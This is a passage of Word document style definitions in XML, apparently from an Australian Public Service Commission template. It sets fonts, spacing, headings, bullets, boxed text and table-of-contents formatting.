    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:aliases w:val="APSC Heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00E50153"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:aliases w:val="APSC Heading 2"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00E50153"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:aliases w:val="APSC Heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0091561C"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:aliases w:val="APSC Heading 4"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0091561C"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:bCs/>
      <w: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PSC Body text"/>
    <w:next w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="007B643F"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:aliases w:val="APSC Body text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="007B643F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:aliases w:val="APSC Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:rsid w:val="0091561C"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoldtext">
    <w:name w:val="APSC Bold text"/>
    <w:basedOn w:val="BodyText"/>
    <w:next w:val="BodyText"/>
    <w:link w:val="APSCBoldtextChar"/>
    <w:qFormat/>
    <w:rsid w:val="004C499B"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="APSCNumberedtext">
    <w:name w:val="APSC Numbered text"/>
    <w:basedOn w:val="NoList"/>
    <w:rsid w:val="0004441B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBlocktext">
    <w:name w:val="APSC Block text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00A72D75"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="180"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:iCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="006A6B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aliases w:val="APSC Footnote Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005C0429"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCtabletextcentred">
    <w:name w:val="APSC table text centred"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00EE7CF1"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCPagenumber">
    <w:name w:val="APSC Page number"/>
    <w:qFormat/>
    <w:rsid w:val="00CB5BC5"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:aliases w:val="APSC Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00954A0A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:aliases w:val="APSC Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00954A0A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedbodytext">
    <w:name w:val="APSC Boxed body text"/>
    <w:qFormat/>
    <w:rsid w:val="00197D4B"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:after="120"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Tahoma"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCTableordiagramheading">
    <w:name w:val="APSC Table or diagram heading"/>
    <w:qFormat/>
    <w:rsid w:val="001E523E"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:aliases w:val="APSC Footnotes"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:rsid w:val="00757E1A"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:aliases w:val="APSC Footnotes Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:rsid w:val="00757E1A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCphotocaption">
    <w:name w:val="APSC photo caption"/>
    <w:rsid w:val="00E2772D"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCtablecolumnheadingscentred">
    <w:name w:val="APSC table column headings centred"/>
    <w:basedOn w:val="APSCtabletextcentred"/>
    <w:rsid w:val="00EE7CF1"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:aliases w:val="APSC Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:rsid w:val="0091561C"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:rsid w:val="00DA4895"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="00DA4895"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCItalicisedtext">
    <w:name w:val="APSC Italicised text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="APSCItalicisedtextChar"/>
    <w:rsid w:val="00DA4895"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCItalicisedtextChar">
    <w:name w:val="APSC Italicised text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="APSCItalicisedtext"/>
    <w:rsid w:val="00DA4895"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style 1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00366246"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCBoldtextChar">
    <w:name w:val="APSC Bold text Char"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:link w:val="APSCBoldtext"/>
    <w:rsid w:val="00017369"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:b/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level1">
    <w:name w:val="APSC Bullet - Level 1"/>
    <w:qFormat/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level3">
    <w:name w:val="APSC Bullet - Level 3"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:ind w:left="851" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level4">
    <w:name w:val="APSC Bullet - Level 4"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="14"/>
      </w:numPr>
      <w:ind w:left="1134" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level5">
    <w:name w:val="APSC Bullet - Level 5"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="15"/>
      </w:numPr>
      <w:ind w:left="1418" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level2">
    <w:name w:val="APSC Bullet - Level 2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="26"/>
      </w:numPr>
      <w:ind w:left="567" w:hanging="283"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCNumbered-Level1">
    <w:name w:val="APSC Numbered - Level 1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00885A58"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCNumbered-Level2">
    <w:name w:val="APSC Numbered - Level 2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00885A58"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="27"/>
      </w:numPr>
      <w:ind w:left="568" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCBoxedbold">
    <w:name w:val="APSC Boxed bold"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00013288"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedbullet1">
    <w:name w:val="APSC Boxed bullet 1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="28"/>
      </w:numPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Tahoma"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedbullet2">
    <w:name w:val="APSC Boxed bullet 2"/>
    <w:basedOn w:val="APSCBoxedbullet1"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="29"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedheading1">
    <w:name w:val="APSC Boxed heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Tahoma"/>
      <w:b/>
      <w:sz w:val="26"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedheading2">
    <w:name w:val="APSC Boxed heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Tahoma"/>
      <w:b/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCBoxeditalics">
    <w:name w:val="APSC Boxed italics"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00013288"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="000F05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F05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0F05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F0534"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBulletedtext">
    <w:name w:val="APSC Bulleted text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00F22F00"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="31"/>
      </w:numPr>
      <w:ind w:left="227" w:hanging="227"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedtext">
    <w:name w:val="APSC Boxed text"/>
    <w:qFormat/>
    <w:rsid w:val="00F22F00"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:after="120"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Tahoma"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:rsid w:val="00F22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22F00"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006137AB"/>
    <w:pPr>
      <w:keepLines/>
      <w:pageBreakBefore w:val="0"/>
      <w:spacing w:before="480"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2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="006137AB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="006137AB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006137AB"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00352B84"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C40E84"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00920F4A"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body1">
    <w:name w:val="Body 1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FB0200"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Arial Unicode MS" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:color="000000"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImportWordListStyleDefinition-119">
    <w:name w:val="Import Word List Style Definition -119"/>
    <w:rsid w:val="009B132C"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="36"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002817E4"/>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992847"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:aliases w:val="APSC Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="00BC7526"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableList3">
    <w:name w:val="Table List 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00FC4CE2"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="30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Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:aliases w:val="APSC Chapter Heading Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0077253D"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang"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413501">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1777679235">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
